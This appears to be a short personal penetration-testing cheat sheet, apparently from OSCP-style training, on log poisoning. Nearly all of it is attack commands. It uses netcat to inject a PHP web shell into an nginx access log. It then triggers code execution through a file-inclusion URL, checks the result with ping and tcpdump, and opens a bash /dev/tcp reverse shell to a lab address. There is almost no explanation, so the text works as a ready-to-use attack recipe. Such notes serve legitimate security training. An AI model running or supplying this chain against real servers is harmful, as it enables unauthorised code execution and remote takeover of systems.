Log Poisoning

Log Poisoning

code

nc -nv $IP 80

GET /<?php passthru($_GET['offsec']); ?>

example

Test RCE

code

tcpdump -i any "icmp"

example

code

http://192.168.1.165/thankyou.php?file=/var/log/nginx/access.log&offsec=ping%20-c%203%20192.168.1.7

example

Reverse Shell

code

bash -c 'bash -i >& /dev/tcp/192.168.1.7/443 0>&1'

• to url encode

example